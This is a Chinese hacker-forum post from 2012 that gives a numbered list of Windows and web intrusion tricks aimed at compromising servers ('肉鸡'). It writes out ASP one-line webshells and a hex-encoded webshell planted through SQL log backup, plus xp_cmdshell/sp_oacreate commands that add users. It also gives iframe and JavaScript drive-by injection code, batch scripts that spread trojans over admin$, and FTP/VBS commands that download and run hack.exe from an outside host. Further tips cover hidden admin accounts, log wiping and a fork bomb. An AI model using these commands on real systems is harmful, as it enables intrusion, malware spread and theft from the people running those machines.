找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2257|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,8 y6 `9 n* a3 Q5 _& T. @% m, V5 K
cacls C:\windows\system32 /G hqw20:R- b. B* N' E2 Q4 n! g
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入0 m; q/ e6 L8 g  w5 x3 X# r/ N
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
6 b9 U1 B7 @. r: ?) x8 q* C( p: c+ S( _8 A3 D  B2 o+ b8 A' }' c6 O
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
  |; t- c: N! O8 U. z4 s2 f: c2 u+ V1 _# x$ Z1 v) `$ l6 j
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。1 g3 I, p* U3 o
5 e, @% M6 {! P- ^
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
1 f; M1 p0 {  {( ?  W6 l4 L- v* v" A+ P
5、利用INF文件来修改注册表
, |. T% ~" O% C) I[Version]
- J# v# V: Z5 a/ c! |4 hSignature="$CHICAGO$"  e1 l4 E1 |3 U7 ^% e
[Defaultinstall]
' h+ z* ^# }5 y3 xaddREG=Ating
6 i( v7 t! o; F8 F; F; n[Ating]6 F  J4 v4 ~% }  o3 o4 _8 h; s) k
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"' T  W. e" F0 w6 m7 M5 f$ N% K
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:, h0 g' S- L8 e# O/ y' Q9 R
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径8 M. M- Y9 e+ S$ e
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
5 H' r7 [( q9 t: [" [( o4 HHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
$ x; _$ g1 Y4 l/ S8 Q/ yHKEY_CURRENT_CONFIG 简写为 HKCC
% _( Q$ O8 g& F6 T1 H0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值+ d5 c% a) K& Z$ y& o
"1"这里代表是写入或删除注册表键值中的具体数据
  X4 q6 g, m; a% T5 d3 t1 _- ^2 z: `0 w
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
! T* F% e8 Q/ X9 J8 J4 @6 c多了一步就是在防火墙里添加个端口,然后导出其键值- p  G9 f  r2 Y. u- H: s* F
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
! `+ K0 I1 ~/ j, N  Y- c( ~  j6 M0 o6 J5 Q2 [) v4 q. D
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
. u& T/ w. G; F( l- g! |在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
/ M; x. D+ L4 ?5 e3 L
" `& X6 Y" Y/ W8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。9 O6 R: B& b/ V! D
3 o1 @$ {6 C& o8 D% j9 |
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
: F  Y# v. H  }% A* H3 s可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
7 t/ v( a' L( t' S6 L9 w5 d! ^9 \: S- y  M9 V
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”& c, K6 i, B! q
8 Y/ h( j/ ^7 _$ x* d
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,) b; Z5 S# S( k. Z+ w2 i- ~3 p7 h2 E
用法:xsniff –pass –hide –log pass.txt
8 N; ]( s" S2 [* b4 ?7 j- A( W5 V# k* S6 M* b3 [; P) E# i9 e
12、google搜索的艺术
2 y  J8 s5 ^* z( C# T/ Z( `- `) I搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”+ y2 V) \4 H) y, e) \
或“字符串的语法错误”可以找到很多sql注入漏洞。
$ O8 o6 R& [( k! E& H, u
- b( e; D' ]2 u- ]! a6 M9 z13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; q' K3 W7 U2 r2 R! m
6 \+ v& \4 D3 w( X
14、cmd中输入 nc –vv –l –p 1987% q9 \. @0 s7 w6 [3 \( I/ m
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
  }2 ~; E1 u$ k5 J( ]9 ^9 H4 o9 q7 k5 g6 }. V, L
15、制作T++木马,先写个ating.hta文件,内容为
$ X4 y- t) W- ~4 q( h<script language="VBScript">
. _9 w' W- B, M6 X% T' l. R$ sset wshshell=createobject ("wscript.shell" )" `5 Y# a7 O" \' a( J
a=wshshell.run("你马的名称",1)
9 g$ |2 [1 ?& B: M" a1 ~8 e$ rwindow.close2 c; p$ _8 d0 K5 m
</script>3 D) z  O& i: s& A9 Q3 ^
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
) }% S- E0 h$ }# ^5 K
0 G8 M9 ?9 o% D; @16、搜索栏里输入
4 y; C( r) y6 I- m关键字%'and 1=1 and '%'='
6 [) Z% A$ m( I" l/ H6 x5 s1 n) X5 e关键字%'and 1=2 and '%'='* V$ a! b; f- ^( i1 O0 e
比较不同处 可以作为注入的特征字符
8 k  @9 n+ |) c) n, b8 ~: n/ `/ R( a  B: E* k! s8 G
17、挂马代码<html>' ]+ e& H; Z$ X7 c4 p9 x) o
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
6 q. J: J) c* H# \2 a6 r</html>3 w, H/ e4 s. p+ x5 @8 e

: f+ V( c; U8 M) r9 {18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,# V! ^2 O! u5 J, S2 _
net localgroup administrators还是可以看出Guest是管理员来。
' K5 d% m6 i* }4 a% w% g6 l$ {; j. v
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等6 f% u$ L5 n! s  g+ A6 R; P
用法: 安装: instsrv.exe 服务名称 路径
" v$ j8 Q. h) s4 d8 G卸载: instsrv.exe 服务名称 REMOVE" R# w# C, x, ~6 d9 a
. p  h% j( I, C( t) e) V+ K
. l1 J4 L2 f& L  j9 P
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉, b- M* q$ }! r4 [" A4 y
不能注入时要第一时间想到%5c暴库。  O# m2 Z7 i# G# {( G* r

' ?/ w7 E8 q: @8 x" `1 _22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
, b  D' E2 h' I9 e' _- i2 H: z+ j/ f8 \2 B1 V1 K
23、缺少xp_cmdshell时
; G" T' j: W( \' y' k尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
( L4 J& @2 S8 @+ a; F假如恢复不成功,可以尝试直接加用户(针对开3389的)0 j* X/ A6 G% ~  X3 C  ~- g5 W
declare @o int
# R# k+ u/ W2 t* Z2 mexec sp_oacreate 'wscript.shell',@o out; k7 H: ~4 ~% I- o+ b0 @: F
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员6 o, ?- o4 l- i# A) p5 B

+ p( p" D) ]/ R' X24.批量种植木马.bat
7 {8 V! |+ H% R2 gfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中8 M( {" b9 ]8 _5 p* q( A9 F; L
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
/ W/ c/ ?& F! |7 s* a* H5 x/ }扫描地址.txt里每个主机名一行 用\\开头0 }5 g5 b6 x& U3 C  C7 Y

6 M4 G( B( ?0 r. j- V) m25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
) ]1 n. k; ?! o' t
& n6 a7 e1 l# p; z2 R0 `26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.# y# ^: R. Q! A/ b- L0 y
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
8 x9 p: ~5 G* [* A6 Z1 n.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
- N# b1 \) K9 D( E. U# d6 Z' Y8 U& r# N
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP3 o* W0 R* p. W2 k+ v
然后用#clear logg和#clear line vty *删除日志
7 Z7 d5 f2 d" }, Z+ g" `- @) {1 s( t4 n: w& w* U$ s
28、电脑坏了省去重新安装系统的方法
; t+ Z6 Y# Z# |7 H纯dos下执行,
$ y* r4 `! b& Pxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config4 t) t: S' [' |
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
7 S+ x& u. P( |8 y$ i: O
3 x  [) r8 u9 |" g5 c, N( u29、解决TCP/IP筛选 在注册表里有三处,分别是:% z1 i5 A& I2 J1 A: B( H* V
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
! s$ d1 M5 n# Z. `- @! c( L7 k9 R4 sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
1 R% l4 P* |4 a3 eHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 c8 h! ]2 F! [" r' I+ y) {分别用) H8 V* \  d: h2 q7 a& e
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 k" I" }8 W; I0 v  x  oregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
% n; J6 p0 w$ m6 S8 ^5 xregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& }  T9 p* p5 ~% n5 H/ W命令来导出注册表项: ~  e7 `. I4 U
然后把三个文件里的EnableSecurityFilters"=dword:00000001,& Q% @! _. _, Q0 k1 ^% U$ L
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
1 o  {- e& X4 J0 n( |regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。8 A( h+ Q6 ^6 u: X" G* r2 Z

: H  h# h" ^5 \, }4 U. P30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
# }. L9 K" O' r$ \. P& @: \& dSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的35 Y/ i: p# s, Z1 j' {9 h- z
- t  |4 m# z2 C0 T2 a0 R! T
31、全手工打造开3389工具
( [1 L9 n7 Y$ C# v! N) o打开记事本,编辑内容如下:. k9 `. g: k$ e
echo [Components] > c:\sql
1 {% S# m; g+ _7 Yecho TSEnable = on >> c:\sql
" r. \; n% G& O5 j  U: _! X6 Jsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
( l: d* m% O. {9 q编辑好后存为BAT文件,上传至肉鸡,执行
& ?# k* S, k3 w
- r$ Z, G, ?7 \4 S9 F32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
8 x, v$ E. g) a) O* z2 `. e0 `8 e3 ^; t) r
33、让服务器重启' I3 g8 ]! `0 m" B
写个bat死循环:5 v; E" ]7 q) [, P5 G2 b
@echo off
2 ]; k4 j5 b6 |/ D3 L:loop1
( ^- T) m' e! d# V8 acls
/ l+ r# |) j, l1 E1 c& ]% T2 Ustart cmd.exe: {& s* T+ \! q0 v" P
goto loop1
9 }# O6 c4 U9 z, }保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启9 c  R4 m7 _3 |& w

$ e' S- t+ W5 G/ m) A, o) W5 ]34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
) D1 Y' T$ a" z% ~! g' s: T@echo off
: h) O& b" m1 Y  p3 i2 j8 Jdate /t >c:/3389.txt8 V$ C/ @, r$ e  N0 M' U+ B4 C* l
time /t >>c:/3389.txt
2 D  N' m9 J4 ~+ K4 ~8 Xattrib +s +h c:/3389.bat" d$ u+ o2 R5 ~3 h0 x: x0 L
attrib +s +h c:/3389.txt. g5 n" @. M; I: I, X1 S6 Y
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
+ P. [- s) n9 ]5 r$ ]8 E0 R并保存为3389.bat
/ ]2 N. C7 K5 q打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号. M7 h. m5 i4 A- H/ Y# `, p
% X3 d: A+ u6 v& I4 U: h' G1 t
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
8 s: Y2 `) V  j- T, [start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)- z6 _$ i3 u' u% _1 V# Z
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
9 k& w# V& O( D+ U6 x7 T
2 E* ~. y, O+ Y+ u0 t36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
5 j. c" N0 s: B- F: M5 T3 _echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
* T& n$ d, F1 a3 j( O% zecho 你的FTP账号 >>c:\1.bat //输入账号
6 u0 ]! u& s2 g" }( v. S: h) `0 aecho 你的FTP密码 >>c:\1.bat //输入密码
% q( N2 \5 Z$ Y( z% v* fecho bin >>c:\1.bat //登入
" Y& K. l  {3 Cecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
/ v" l" P  d& F7 Wecho bye >>c:\1.bat //退出
- V5 {! k: U, |. f然后执行ftp -s:c:\1.bat即可! {( g, @- X7 ~2 N% L" [  R
" u  A% J3 D2 o7 @7 V0 A
37、修改注册表开3389两法5 ~) D3 A* e' d5 F# x
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
4 m, T5 V1 t- zecho Windows Registry Editor Version 5.00 >>3389.reg
! u1 v6 u8 B& Y4 c9 {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
/ v* E2 A& y, w3 ~echo "Enabled"="0" >>3389.reg" S. `* R" X- d/ x, s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
1 e$ ?( n, j: U0 UNT\CurrentVersion\Winlogon] >>3389.reg+ r( b9 R, q  |2 U( q" i
echo "ShutdownWithoutLogon"="0" >>3389.reg
4 @) H3 T+ b0 ?0 q) {# Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
. _$ e0 \4 l+ x0 o>>3389.reg( p  J' H( [4 q( j4 R
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg- K9 M" l; V, D8 H+ L0 f) z) K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]! x. r9 U& J+ I. i" L! D) {
>>3389.reg$ _8 G) j8 F% x6 A- N. a) m. G
echo "TSEnabled"=dword:00000001 >>3389.reg2 e8 l/ C6 h* I1 B) ?( Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg% A9 a5 k( R( y+ Y* h2 W2 t
echo "Start"=dword:00000002 >>3389.reg
2 |% J$ ~% g$ becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]) x; V5 z* E5 @  ], m0 |, {
>>3389.reg
/ B" Z- Y. I; O  i/ p' B6 Becho "Start"=dword:00000002 >>3389.reg+ b# f- o7 k/ ^% b( f4 i) c. m
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
: J. i$ R& B4 t! Zecho "Hotkey"="1" >>3389.reg
( ^0 H: y, y( g" L# _. ~4 `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: A( H& \+ x$ o1 @3 NServer\Wds\rdpwd\Tds\tcp] >>3389.reg( t6 z/ s% y; z% ~8 `' O
echo "PortNumber"=dword:00000D3D >>3389.reg
' a6 d+ w3 @) n! [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& Q' }3 T' r& C, AServer\WinStations\RDP-Tcp] >>3389.reg( [( a3 X7 d- d" ^
echo "PortNumber"=dword:00000D3D >>3389.reg" \7 D* t/ ~5 l3 U$ Z
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
5 e& F: X6 D7 ~) L$ ^$ y7 Z(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
% C: h' ?/ Q+ ]" ~6 g因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
- k- w1 r% F0 |. T(2)winxp和win2003终端开启9 \1 {; P1 L8 P' J$ ~) e2 K( S
用以下ECHO代码写一个REG文件:
5 _. w, J4 H$ a$ h7 `+ ?echo Windows Registry Editor Version 5.00>>3389.reg
3 \0 d. J* r5 W. I# J7 j3 Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* O+ {0 t2 z% _2 k& ]* S
Server]>>3389.reg
0 B' x4 S4 S' }3 Q; secho "fDenyTSConnections"=dword:00000000>>3389.reg' B7 }- U  f1 E4 m* A2 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! _3 f6 O+ f  [/ _& V/ Z
Server\Wds\rdpwd\Tds\tcp]>>3389.reg. |" |/ Q5 @& Z( t
echo "PortNumber"=dword:00000d3d>>3389.reg
! @: L. t4 o* ], d  h, J3 @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 R9 h- P+ x1 w8 `
Server\WinStations\RDP-Tcp]>>3389.reg* R! [  F4 Y) R+ Z
echo "PortNumber"=dword:00000d3d>>3389.reg* P" Q$ C% D9 y  f- ?! B7 ~
然后regedit /s 3389.reg del 3389.reg% c2 U: d2 N" L; ]
XP下不论开终端还是改终端端口都不需重启  r( d+ [8 v, U, M

/ r2 i! i' @3 J2 R' x38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃# g% _- X! s9 l1 }9 x
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 t' M- L4 @) F/ m# {9 ^& [7 g) r9 _% ^% ^& y) J5 z
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
- ]# U" J' r  S) k5 ](1)数据库文件名应复杂并要有特殊字符3 q5 Z/ o: ]( G# X9 o
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
$ q$ x" V( a0 \将conn.asp文档中的9 \1 p& n0 [, y0 u( c) m6 p( v
DBPath = Server.MapPath("数据库.mdb")  |( ]6 H- d' Q7 x. @0 h
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
7 C& W( O* ]) Q( r6 `' M) E$ V% M$ }6 s; d7 O2 {
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
6 y/ ~. o6 N6 i' p3 l8 y(3)不放在WEB目录里
2 R0 C6 ^6 {$ A! @' y+ j+ Q$ v
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
1 }( U. ]' w' G1 t3 s: o$ \. \可以写两个bat文件
9 k- @* X" h2 G5 o. y@echo off) w6 _; f3 n) S
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe+ k. |/ R6 B3 b2 ]7 Z" W
@del c:\winnt\system32\query.exe$ V+ J; P8 L+ ^! g; I
@del %SYSTEMROOT%\system32\dllcache\query.exe
/ X0 ^5 ~7 P9 w# E$ g@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的9 t' _1 Q2 d: l! o
/ n+ L. [) l5 [3 T, H5 p; ?- q/ j
@echo off
% D/ \7 G, i0 p1 Y8 L@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
' K) h( F* A. w( Z$ ]* U. t# ^  Q# E@del c:\winnt\system32\tsadmin.exe5 ]1 y8 t) ~$ E; `
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex% d; y  G7 q+ `, P. @

( @: A+ d: n- u' b41、映射对方盘符, ~" V; e3 }! E0 P* H- |& z# j
telnet到他的机器上,
* L* K, K  n( H; U2 R( X, wnet share 查看有没有默认共享 如果没有,那么就接着运行
+ M* P! x: m- G0 Inet share c$=c:' z$ F2 S2 s$ U6 V; q
net share现在有c$
9 a- b/ N1 k8 g: F* _1 q) P在自己的机器上运行
; g. ?- L) o( |, T8 k* Gnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
0 x2 b- K- A% z. O& a9 X+ Z
8 p7 R) o# ~2 [: T42、一些很有用的老知识4 o1 b& V/ b2 v! K+ v: K2 v
type c:\boot.ini ( 查看系统版本 )
5 L* Y( i5 |' v2 p1 hnet start (查看已经启动的服务)# F0 c7 ^& X! z" ^! b( O
query user ( 查看当前终端连接 )
$ `3 ]' ?. u  X& y$ s$ l1 W8 xnet user ( 查看当前用户 ), Y7 B9 `& u7 m6 k" d
net user 用户 密码/add ( 建立账号 )
) V" f% P; u0 v/ y8 j9 Y  p0 h+ inet localgroup administrators 用户 /add (提升某用户为管理员)' L, O. S6 ?4 H) l% i
ipconfig -all ( 查看IP什么的 )8 N7 L& ?3 ~# s% p2 {
netstat -an ( 查看当前网络状态 )
6 l1 ^% J& ]3 b4 D: Y; m  wfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
" @4 X: N4 B& J% x克隆时Administrator对应1F4* s# Y9 S/ i8 [1 n* C
guest对应1F5
& g; m* O+ ?. Jtsinternetuser对应3E8
1 g# z0 h/ Y8 V9 c! g+ X, {3 }: u
4 z  b- }  X) h' E; A4 U/ r0 [43、如果对方没开3389,但是装了Remote Administrator Service& J4 \7 k5 T4 u" @. p- Y
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
0 w% J3 B2 p& U9 S解释:用serv-u漏洞导入自己配制好的radmin的注册表信息9 }8 s1 w) L5 K/ e4 {
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
% |5 L( Y3 Z# E$ X% D; J0 d$ K) M/ l6 l1 ^; {* k
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; |, T2 y+ `' Y  Q2 C* C9 K3 e; Z本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)" X  B5 e/ I" R; \$ P( H
- ?- m) }9 @2 s
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)# ?4 `7 @4 l# [) K; V3 ?
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
# H/ \7 j1 E6 J7 x^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =: ?# w; d& [9 {4 X, \
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
' r% q! R+ d5 O. M4 j1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs, ]! M, x7 @$ n5 N  K: o8 u
(这是完整的一句话,其中没有换行符)
- h& f1 O' l; r7 Q! I9 f- r+ x7 W: D然后下载:2 o8 K) L% p# r" y
cscript down.vbs http://www.hack520.org/hack.exe hack.exe  ]& N6 k% `" b6 u- Y

" z( K# \5 w# H9 d& @* k4 I9 I4 X46、一句话木马成功依赖于两个条件:
/ u+ m; O/ F6 G7 R, w1、服务端没有禁止adodb.Stream或FSO组件
+ a# [) ?% ?6 L" g5 X8 Y& N' K2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
+ M: S0 G0 l6 E, h7 k  f2 U5 k6 s1 b5 h
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
5 r1 K( \4 @0 y+ R;alter database utsz set RECOVERY FULL--9 i+ ?% }' {9 F' A
;create table cmd (a image)--8 Q9 W5 ~: j2 N3 W
;backup log utsz to disk = 'D:\cmd' with init--8 C( [+ b/ v* y& m& Y
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--/ x; X" s; {& T8 \  @6 Z/ W
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--# D% R6 l: g: a
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
0 G$ p% d: L9 X& B+ d* J
5 u% Z) M& L( k% q5 P6 ]) E48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
( A3 t4 M) z# B' u; t  [9 ~6 ?% {' b: v, }/ k  b& k
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
% _6 [' }% o* B) e8 y所有会话用 'all'。: [8 b! q9 Q* t; n) U+ B" A6 m! q
-s sessionid 列出会话的信息。
: ^1 [0 {0 P; ]% ^9 a8 N-k sessionid 终止会话。
/ f' _* D8 W4 f3 n$ m: k-m sessionid 发送消息到会话。4 G, |0 r7 d! ^0 v5 |( y
. J  }' w! v& x& i) b
config 配置 telnet 服务器参数。
1 N1 V8 z! Q% d" A, m$ v: y8 L: i/ L9 l" Y: m
common_options 为:4 C, b& y% |( Z- i/ j+ H
-u user 指定要使用其凭据的用户
+ ^1 Z3 A% s) {$ D: f-p password 用户密码& T* E& k0 h( C2 L7 m
6 S/ `6 e$ P5 I) S; q. b
config_options 为:
* I; p% E/ ?; @9 {! pdom = domain 设定用户的默认域
+ x6 `( A$ u4 i5 [% X; C! T$ Bctrlakeymap = yes|no 设定 ALT 键的映射
5 D6 B- r9 z+ t( U# E# `timeout = hh:mm:ss 设定空闲会话超时值
- x& d2 B: X! D9 g! Itimeoutactive = yes|no 启用空闲会话。3 Z% t5 E; k' f  n) s0 D: M4 K0 E
maxfail = attempts 设定断开前失败的登录企图数。9 Z; o$ ]' a) n* T: J8 T
maxconn = connections 设定最大连接数。
7 y. |+ w: ^# q/ t  P* @% Tport = number 设定 telnet 端口。5 _. X3 R0 i3 s
sec = [+/-]NTLM [+/-]passwd- s- G* V6 q+ A# b$ e9 K& E1 h% ^
设定身份验证机构
( l1 s2 k! `3 k0 S: {/ zfname = file 指定审计文件名。0 u0 k% b7 M. o) f% m  ^
fsize = size 指定审计文件的最大尺寸(MB)。
0 m, O$ q4 G8 b, n# x& q( umode = console|stream 指定操作模式。
6 E4 \4 R+ W# B; ?3 K6 Z" Nauditlocation = eventlog|file|both9 H) B! P5 E" |+ |; a
指定记录地点
6 \# b" ~* f" s; [0 p1 E$ N( qaudit = [+/-]user [+/-]fail [+/-]admin9 V" m7 l6 l) D) `# f0 J. V
0 B: o! i9 v7 u8 h9 Z( o
49、例如:在IE上访问:% d* u  ~4 U0 W. N+ y% [
www.hack520.org/hack.txt就会跳转到http://www.hack520.org// A% K8 [$ n  f; g. B) S/ D
hack.txt里面的代码是:
% ]- o9 U- q+ f7 @: H<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">. R- M# c! _( w! c% [
把这个hack.txt发到你空间就可以了!! X3 z+ `8 j& z2 p
这个可以利用来做网马哦!
3 a  c! b& K; j4 E
0 |! Q1 D7 {0 g7 O1 B50、autorun的病毒可以通过手动限制!, H% s0 I' A$ a7 E& R
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
8 Q4 s. f% ?" j: X/ O# ^2,打开盘符用右键打开!切忌双击盘符~% v8 ]1 ^7 I5 Q+ }! J& x
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!& y+ v2 y. \- y9 k/ O$ A
% C! g7 H1 ^8 G! A1 ~
51、log备份时的一句话木马:  p6 `, U' c) j; U0 V5 ^/ t
a).<%%25Execute(request("go"))%%25>+ B% ]1 s' V; }
b).<%Execute(request("go"))%>
. g& |2 ?( Y( q: d5 h* Mc).%><%execute request("go")%><%
